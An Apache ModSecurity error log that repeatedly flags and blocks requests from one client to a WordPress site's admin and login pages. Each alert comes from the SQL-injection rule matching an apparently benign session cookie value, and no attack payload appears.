[Mon May 11 18:32:59.882091 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEuzJnyuKVXoStDhbiowAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:59.882383 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEuzJnyuKVXoStDhbiowAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:00.497117 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEuzJnyuKVXoStDhbiowAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:00.820043 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEvDJnyuKVXoStDhbipQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:00.820346 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEvDJnyuKVXoStDhbipQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:01.447107 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEvDJnyuKVXoStDhbipQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:01.663354 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEvTJnyuKVXoStDhbipgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:01.663636 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEvTJnyuKVXoStDhbipgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:02.249016 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEvTJnyuKVXoStDhbipgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:02.540586 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEvjJnyuKVXoStDhbiqAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:02.540882 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEvjJnyuKVXoStDhbiqAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:02.910774 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEvjJnyuKVXoStDhbiqAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:03.319908 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEvzJnyuKVXoStDhbiqQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:03.320208 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEvzJnyuKVXoStDhbiqQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:03.931948 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEvzJnyuKVXoStDhbiqQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:04.211934 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEwDJnyuKVXoStDhbiqwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:04.212278 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEwDJnyuKVXoStDhbiqwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:04.845567 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEwDJnyuKVXoStDhbiqwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:05.214051 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEwTJnyuKVXoStDhbirQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:05.214347 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEwTJnyuKVXoStDhbirQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:05.821628 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEwTJnyuKVXoStDhbirQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:06.169886 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEwjJnyuKVXoStDhbirgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:06.170193 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEwjJnyuKVXoStDhbirgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:06.804443 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEwjJnyuKVXoStDhbirgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:06.923471 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEwjJnyuKVXoStDhbisAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:06.923763 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEwjJnyuKVXoStDhbisAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:07.519022 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEwjJnyuKVXoStDhbisAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:07.929874 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEwzJnyuKVXoStDhbisQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:07.930168 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEwzJnyuKVXoStDhbisQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:08.309484 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEwzJnyuKVXoStDhbisQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:08.749965 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIExDJnyuKVXoStDhbiswAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:08.750271 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIExDJnyuKVXoStDhbiswAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:10.176378 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIExDJnyuKVXoStDhbiswAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:10.514092 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIExjJnyuKVXoStDhbitgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:10.514392 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIExjJnyuKVXoStDhbitgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:11.525701 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIExjJnyuKVXoStDhbitgAAAFM"], referer: https://rentparadise.fr/wp-login.php
